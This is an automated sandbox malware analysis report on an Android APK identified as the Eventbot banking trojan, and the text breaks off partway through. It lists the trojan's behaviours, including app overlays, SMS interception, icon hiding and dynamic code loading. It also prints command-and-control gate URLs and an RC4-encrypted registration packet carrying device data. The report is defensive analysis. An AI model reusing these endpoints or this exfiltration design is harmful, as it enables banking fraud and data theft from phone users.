Loading ...

Play interactive tourEdit tour

Analysis Report bpLldiCjub

Overview

General Information

Joe Sandbox Version:28.0.0
Analysis ID:1093224
Start date:20.03.2020
Start time:16:31:36
Joe Sandbox Product:Cloud
Overall analysis duration:0h 10m 52s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:bpLldiCjub
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android 7.1 Nougat
APK Instrumentation enabled:true
Detection:MAL
Classification:mal64.troj.spyw.evad.and@0/252@4/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 216.58.205.227, 172.217.18.106, 216.58.208.42, 172.217.18.110, 172.217.18.14, 172.217.18.174, 216.58.207.78, 172.217.16.174, 172.217.23.110, 216.58.210.14, 172.217.22.46, 172.217.22.110, 172.217.21.238, 172.217.21.206, 172.217.23.174, 172.217.23.142, 216.58.205.238, 172.217.22.14, 172.217.18.170, 172.217.16.142, 216.58.207.46, 172.217.18.10, 216.58.210.10
  • Excluded domains from analysis (whitelisted): youtubei.googleapis.com, android.clients.google.com, android.l.google.com, youtube-ui.l.google.com, www.googleadservices.com, android.googleapis.com, cloudconfig.googleapis.com, play.googleapis.com, www.gstatic.com, www.googleapis.com, mdh-pa.googleapis.com
  • No interacted views
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all non-executed APIs are in report
  • Not all resource files were parsed
  • Report size exceeded maximum capacity and may have missing dynamic data code.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold640 - 100Report FP / FNfalse
Eventbot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Remote ManagementWinlogon Helper DLLPort MonitorsApplication Discovery1Access Stored Application Data1Application Discovery1Application Deployment SoftwareAccess Stored Application Data1Data Encrypted1Standard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesObfuscated Files or Information1Capture SMS Messages1System Information Discovery1Remote ServicesCapture SMS Messages1Exfiltration Over Other Network MediumStandard Non-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionRootkitInput CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Signature Overview

Click to jump to signature section


Networking:

barindex
Opens an internet connectionShow sources
Source: com.lib;->sendPost:3171API Call: java.net.URL.openConnection("http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c")
Source: com.lib;->sendPost:3171API Call: java.net.URL.openConnection("http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c")
Source: com.lib;->downloadFile:1682API Call: java.net.URL.openConnection (not executed)
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.100
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.163
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.100
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.18.100
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: i.ytimg.com
Urls found in memory or binary dataShow sources
Source: androidString found in binary or memory: http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
Source: androidString found in binary or memory: http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c
Source: androidString found in binary or memory: http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c;http://ora.carlaarrabitoarchitetto.com/gat
Source: ic_launcher_foreground.xmlString found in binary or memory: http://schemas.android.com/aapt
Source: abc_tint_btn_checkable.xml, abc_select_dialog_material.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto
Source: common_google_signin_btn_icon_light_focused.xml, ic_launcher_foreground.xml, abc_tint_btn_checkable.xml, notification_action_background.xml, abc_screen_simple.xml, abc_search_view.xml, abc_seekbar_thumb_material.xml, abc_action_menu_item_layout.xml, abc_alert_dialog_title_material.xml, abc_screen_simple_overlay_action_mode.xml, abc_alert_dialog_button_bar_material.xml, abc_select_dialog_material.xml, abc_cascading_menu_item_layout.xml, abc_slide_out_bottom.xml, abc_expanded_menu_layout.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: androidString found in binary or memory: https://plus.google.com/
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games_lite
Uses HTTP for connecting to the internetShow sources
Source: com.lib;->downloadFile:1690API Call: java.net.HttpURLConnection.connect
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 55266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55266
Source: unknownNetwork traffic detected: HTTP traffic on port 42662 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33152
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33150
Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42662
Source: unknownNetwork traffic detected: HTTP traffic on port 33150 -> 443

E-Banking Fraud:

barindex
Detected Eventbot e-Banking trojan loaderShow sources
Source: Lcom/lib;->doSMS(Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)VMethod string: Ginp strings
Has functionalty to add an overlay to other appsShow sources
Source: com.lib;->hideArea:521API Call: WindowManager.addView
Source: com.lib;->hidePinnedHint:532API Call: WindowManager.addView
Source: com.lib;->createOverlay:1097API Call: WindowManager.addView
Source: com.lib;->createOverlay:1110API Call: WindowManager.addView
Source: com.lib;->createOverlayOld:1157API Call: WindowManager.addView

Change of System Appearance:

barindex
May access the Android keyguard (lock screen)Show sources
Source: androidString found in binary or memory: keyguard
Acquires a wake lockShow sources
Source: com.lib;->setWakeLocks:3294API Call: android.os.PowerManager$WakeLock.acquire
Source: com.lib;->setWakeLocks:3315API Call: android.os.PowerManager$WakeLock.acquire

System Summary:

barindex
Requests to ignore battery optimizationsShow sources
Source: Lcom/lib;->requestOptimizationsIgnored(Landroid/content/Context;)VMethod string: "android.settings.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.READ_SMS
Source: submitted apkRequest permission: android.permission.RECEIVE_SMS
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Classification labelShow sources
Source: classification engineClassification label: mal64.troj.spyw.evad.and@0/252@4/0
Reads shares settingsShow sources
Source: com.lib;->getBotUID:1753API Call: android.content.SharedPreferences.getString
Source: com.lib;->getConfigID:1765API Call: android.content.SharedPreferences.getString
Source: com.lib;->getGateUrl:1810API Call: android.content.SharedPreferences.getString
Source: com.lib;->getPinnedPref:1859API Call: android.content.SharedPreferences.getString
Source: com.lib;->getSystemSmsApp:1872API Call: android.content.SharedPreferences.getString
Source: com.lib;->isNeedASniff:1972API Call: android.content.SharedPreferences.getBoolean
Source: com.lib;->isNeedPinned:1995API Call: android.content.SharedPreferences.getBoolean
Source: com.lib;->isNeedWebInj:2005API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.auth.api.signin.internal.Storage;->zaf:50API Call: android.content.SharedPreferences.getString

Data Obfuscation:

barindex
Found very long method stringsShow sources
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: 0563dd99761227c7ed4e59cacac8d3ff6728c1b1eb4af7fa250f9965b6fbe8c245c1a862785cfefc7a790859db33763fd64100209e63a671cf0cee7dd15faabff9ce4454f388294ce34052f0a5137bb38a7aabc3800ed5bb9038dac14d97d0b837c7c4219194fa0ab09db0ff4ae36d55f2c05a50d6d84252a0cc86f73756642 Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: 19e3f8c7dba690f8e523a373f74770221ba2d4a60e3a0b736958df130851d99bd38f31f171a11e5fa2380565259176390437f4f04f4deeb3af3d6a970274c4eae88fb89d0fa9a05108659e7b17e0d4aa1b7d422b84336027a43c64dafe73d503dd99a625f8e85cc677d8496fb51b7be59eed9270e134e22aa082d753e786d40 Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: 59072a8fdb5c77018e78cd74a7892869a17fa81137900ccd34289d6d632cd193c915e1eb001803fb32ed5d48624962b400d6b29e3bafda5be0e9293256876f85581e724e7c4567144d30a060cedd6904d3cb82d8850868c9b71a0a1affaf6e7e51a551cff753d48e0e787520fb1c1833680849a6af468a9cdfee71ab07bf1a6 Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: 91d8aff7f46aafbf6fd0deb4f0ac7c6d32e7bf3408e4fd18aca0942c0e2acf6a1a2c59142f46878dabc2c2c6dcebac0f7ad071fd72150c9836847ff4a000e5f967be9288a6d77ac1ecaaaa24d0a3cd23eaeb40924a8095dbb0eb490015df084f0d4a8196b7c59ceba76762c8c516a8daa18e5ee78db7b763bceaaf994bede31 Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: 955b4b926d63e37811c0b9d24ece5d7e55662187c32656be818ad5b0f14f535309c0c7de1779305e6b7147831cfccff088e9f5358460640c5960486db05755190584d92971d6c47ea69b03a96f59328c6f68dee6e14d20019466feee7dbc8ed045e9e1802df54747a8334ea2ca4dda3d58649fc7c45f46e2dfcb8bc595b040c Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: ad466d828ff565c85015e770b6e9f94a6badb281dc1e3ff69fab3d57e5e4a33b026aca83c4db075ae9532b1f38745e719f13f787eac6b42ce815e2cfa0ce8ec296bdd6f622ddc75f9743f164057bbdaee8c7325db0117477e2a66ee1ad204e3b5bcee714ec441125946d784632045227049726259e835ecde77eda451695cc5 Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: bb3b5e6a820089303a7972ff12b1839d4cf4f05879d55e0951c7bedac7803e896b5b83be4ebb6a9f9efeb9204f5545f8bdf04f79a3f1b92883413d5e45d0dd4859af4765b8ee118a8880245ce8b15ce5da375765b0b5c2b7a9312c2ff80dd86c6d8bd8ee227361dcc94118009901a1d46e59635e6ed3cde0523b8e2fbf2c76e Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: dcf5893ec2b3b7df0482628e309cc064f6b36573ea418d6d0021b104662bad49299bb8ffb006c1b04919ffd59fbe83f467a6e7924650a1dd052fd3d8495cbeb36b02be2cf889537a7c96469953648e3642ee0cda358fb9ceef2f324560622858938a19c33af73a258bd5776694491969cc33a63c2bbb01b4042e166cbdfe294 Length: 5812
Source: Lcom/lib;->bytesToHex([B)Ljava/lang/String;Method string: ee40db488b6f2bc7ac33cc566601c52bf6cb093c611e0b583d4b3f210ec13c2ce3b2df8de8c61e12ca9852767737f889367fadae4172fd571f39c202bae06f3d116c2683d61bcbe21f12414f0cf46f5dce57ec86ce0d18467cb61e36605a304cc9c8bea18d717aff4c55b65f563df30ed23291897095ae7647ee55abf42cd08 Length: 5812
Obfuscates method namesShow sources
Source: bpLldiCjubTotal valid method names: 60%
Uses reflectionShow sources
Source: com.example.eventbot.MainActivity;->CheckForCoarseLocationPermission:8API Call: java.lang.reflect.Method.invoke
Source: com.example.eventbot.MainActivity;->CheckForCoarseLocationPermission:36API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.dynamic.ObjectWrapper;->unwrap:9API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->getLocalVersion:28API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->getLocalVersion:30API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.dynamite.DynamiteModule;->zza:150API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.common.server.response.FastJsonResponse;->getFieldValue:75API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:23API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->fromPackageAndModuleExperimentalPi:33API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->fromPackageAndModuleExperimentalPi:36API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->fromPackageAndModuleExperimentalPi:39API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->zza:57API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->zza:66API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->zza:76API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->zza:80API Call: java.lang.reflect.Method.invoke
Source: androidx.versionedparcelable.VersionedParcel;->readFromParcel:56API Call: java.lang.reflect.Method.invoke
Source: androidx.versionedparcelable.VersionedParcel;->writeToParcel:117API Call: java.lang.reflect.Method.invoke

Boot Survival:

barindex
Has permission to execute code after phone rebootShow sources
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED
Installs a new wake lock (to get activate on phone screen on)Show sources
Source: com.lib;->setWakeLocks:3292API Call: android.os.PowerManager.newWakeLock

Hooking and other Techniques for Hiding and Protection:

barindex
Removes its application launcher (likely to stay hidden)Show sources
Source: com.lib;->hideIcon:1912API Call: unknown.AppCompatSeekBar.java
Aborts a broadcast event (this is often done to hide phone events such as incoming SMS)Show sources
Source: com.lib;->doMMS:1620API Call: android.content.BroadcastReceiver.abortBroadcast
Source: com.lib;->doPUSH:1625API Call: android.content.BroadcastReceiver.abortBroadcast
Source: com.lib;->doSMS:1652API Call: android.content.BroadcastReceiver.abortBroadcast
Has permission to draw over other applications or user interfacesShow sources
Source: submitted apkRequest permission: android.permission.SYSTEM_ALERT_WINDOW
Uses Crypto APIsShow sources
Source: com.example.eventbot.service;->md5:150API Call: java.security.MessageDigest.getInstance
Source: com.example.eventbot.service;->md5:152API Call: java.security.MessageDigest.update
Source: com.example.eventbot.service;->genLibUpdateName:61API Call: java.security.MessageDigest.digest
Source: com.example.eventbot.service;->md5:152API Call: java.security.MessageDigest.update
Source: com.example.eventbot.service;->genLibName:47API Call: java.security.MessageDigest.digest
Source: com.example.eventbot.service;->fallbackLib:12API Call: javax.crypto.Cipher.getInstance
Source: com.example.eventbot.service;->fallbackLib:17API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3323API Call: java.security.MessageDigest.getInstance
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.lib;->sha256:3326API Call: unknown.Could not access the field in remoteBinder.
Source: com.lib;->rc4:2904API Call: javax.crypto.Cipher.getInstance
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal
Source: com.example.eventbot.MainActivity;->sha256:77API Call: java.security.MessageDigest.getInstance
Source: com.example.eventbot.MainActivity;->sha256:80API Call: java.security.MessageDigest.digest
Source: com.example.eventbot.MainActivity;->sha256:82API Call: java.security.MessageDigest.getInstance
Source: com.example.eventbot.MainActivity;->sha256:83API Call: java.security.MessageDigest.digest
Source: com.example.eventbot.service;->fallbackLib:16API Call: javax.crypto.Cipher.init
Source: com.example.eventbot.service;->md5:153API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.zzm;->zza:10API Call: java.security.MessageDigest.digest
Source: com.lib;->md5:2385API Call: java.security.MessageDigest.getInstance
Source: com.lib;->md5:2387API Call: java.security.MessageDigest.update
Source: com.lib;->md5:2388API Call: java.security.MessageDigest.digest
Source: com.lib;->rc4:2908API Call: javax.crypto.Cipher.init
Source: com.lib;->sha256:3328API Call: java.security.MessageDigest.getInstance
Source: com.lib;->sha256:3329API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.util.AndroidUtilsLight;->getPackageCertificateHashBytes:13API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.util.AndroidUtilsLight;->zzi:14API Call: java.security.MessageDigest.getInstance

Malware Analysis System Evasion:

barindex
Accesses android OS build fieldsShow sources
Source: com.example.eventbot.service;->loadLib:70Field Access: android.os.Build.MANUFACTURER
Source: com.example.eventbot.service;->loadLib:70Field Access: android.os.Build.MODEL
Source: com.example.eventbot.service;->loadLib:77Field Access: android.os.Build.MANUFACTURER
Source: com.example.eventbot.service;->loadLib:77Field Access: android.os.Build.MODEL
Source: com.lib;->makeRegPacket:2262Field Access: android.os.Build.MANUFACTURER
Source: com.lib;->makeRegPacket:2265Field Access: android.os.Build.MODEL
Source: com.example.eventbot.service;->genLibName:42Field Access: android.os.Build.MANUFACTURER
Source: com.example.eventbot.service;->genLibName:44Field Access: android.os.Build.MODEL
Source: com.example.eventbot.service;->genLibUpdateName:54Field Access: android.os.Build.MANUFACTURER
Source: com.example.eventbot.service;->genLibUpdateName:56Field Access: android.os.Build.MODEL
Source: com.example.eventbot.service;->genLibUpdateName:58Field Access: android.os.Build.MODEL
Source: com.lib;->activatePinned:927Field Access: android.os.Build.MANUFACTURER
Source: com.lib;->activatePinned:940Field Access: android.os.Build.MANUFACTURER
Source: com.lib;->genLibUpdateName:1725Field Access: android.os.Build.MANUFACTURER
Source: com.lib;->genLibUpdateName:1727Field Access: android.os.Build.MODEL
Source: com.lib;->genLibUpdateName:1729Field Access: android.os.Build.MODEL
Source: com.google.android.gms.common.util.DeviceProperties;->isUserBuild:48Field Access: android.os.Build.TYPE
Queries several sensitive phone informationsShow sources
Source: Lcom/lib;->makeRegPacket(Landroid/content/Context;)Lorg/json/JSONObject;Method string: "os"
Source: Lcom/lib;->hideNavBarOld(Landroid/content/Context;)Landroid/widget/FrameLayout;Method string: "android"
Source: Lcom/lib;->setInjectError(Lorg/json/JSONObject;)VMethod string: "type"
Source: Lcom/lib;->makeRegPacket(Landroid/content/Context;)Lorg/json/JSONObject;Method string: "model"
Source: Lcom/lib;->parseSMS(Landroid/content/Context;Landroid/content/Intent;)Lorg/json/JSONObject;Method string: "time"
Queries the unique operating system id (ANDROID_ID)Show sources
Source: com.lib;->getUID:1881API Call: android.provider.Settings.Secure.getString

Anti Debugging:

barindex
Creates a new jar file (likely to load a new code)Show sources
Source: com.example.eventbot.service;->loadLib:71API Call: java.io.File.<init> /data/user/0/com.example.eventbot/app_dex/dfe931bcbaf1ab88b1c3895ab745dc6.jar
Source: com.example.eventbot.service;->loadLib:78API Call: java.io.File.<init> /data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar

HIPS / PFW / Operating System Protection Evasion:

barindex
Uses the DexClassLoader (often used for code injection)Show sources
Source: com.example.eventbot.service;->loadLib:101API Call: dalvik.system.DexClassLoader.<init>("/data/user/0/com.example.eventbot/app_dex/72f5ed646cc01b83bc93e921e366fe0.jar")
Source: com.example.eventbot.service;->loadLib:103API Call: dalvik.system.DexClassLoader.loadClass("com.lib")

Stealing of Sensitive Information:

barindex
Encrypting sensitive phone information (probably leaked later)Show sources
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, com.android.cellbroadcastreceiver, android.ext.shared, com.android.server.telecom, com.google.android.syncadapters.contacts, com.example.android.notepad, com.android.keychain, com.android.chrome, com.android.printservice.recommendation, com.android.dialer, com.android.gallery3d, com.google.android.gms, com.google.android.gsf, android.ext.services, com.android.calllogbackup, com.google.android.partnersetup, com.android.packageinstaller, com.android.basicsmsreceiver, com.svox.pico, com.android.proxyhandler, com.android.inputmethod.latin, com.google.android.feedback, com.google.android.syncadapters.calendar, com.android.managedprovisioning, com.android.providers.partnerbookmarks, com.google.android.gsf.login, com.android.wallpaper.livepicker, jackpal.androidterm, com.google.android.backuptransport, com.android.storagemanager, com.android.bookmarkprovider, com.android.settings, com.farmerbb.taskbar.androidx86, com.cyanogenmod.eleven, com.android.calculator2, com.android.cts.ctsshim, com.android.vpndialogs, com.android.email, com.android.phone, com.android.shell, com.android.wallpaperbackup, com.android.providers.blockednumber, com.android.providers.userdictionary, com.android.emergency, com.android.location.fused, com.android.deskclock, com.android.systemui, com.android.bluetoothmidiservice, com.google.android.gms.setup, com.android.bluetooth, com.android.development, com.android.wallpaperpicker, com.example.eventbot, com.android.providers.contacts, com.android.captiveportallogin]","GPstatus":false,"GPversion":"11.4.16-all [0] [PR] 209796717","botnetID":"test2005","botVer":"0.0.0.2","libVer":"0.0.0.1","screenLockType":1}}", Leaked: "Secure.ANDROID_ID=b8e688b87ab41f9")
Source: com.lib;->rc4:2909API Call: javax.crypto.Cipher.doFinal (Encrypted Data: "{"reason":"reg","data":{"UID":"b8e688b87ab41f9","OS":"7.1.2","MODEL":"samsung","VENDOR":"Galaxy Nexus","APPS":"[com.android.cts.priv.ctsshim, com.google.android.youtube, com.google.android.ext.services, com.example.android.rssreader, com.android.providers.telephony, org.android_x86.analytics, com.google.android.googlequicksearchbox, com.android.providers.calendar, com.android.providers.media, com.google.android.onetimeinitializer, com.google.android.ext.shared, com.android.wallpapercropper, org.zeroxlab.util.tscal, com.android.documentsui, com.android.externalstorage, com.android.htmlviewer, com.android.mms.service, com.android.providers.downloads, com.google.android.configupdater, com.android.defcontainer, com.android.providers.downloads.ui, com.android.vending, com.android.pacprocessor, com.android.certinstaller, com.android.carrierconfig, android, com.android.contacts, com.android.camera2, com.android.egg, com.android.mtp, com.android.launcher3, com.android.backupconfirm, com.android.statementservice, com.google.android.gm, com.android.calendar, com.google.android.setupwizard, com.android.providers.settings, com.android.sharedstoragebackup, com.android.printspooler, com.android.dreams.basic, com.android.webview, com.android.inputdevices, 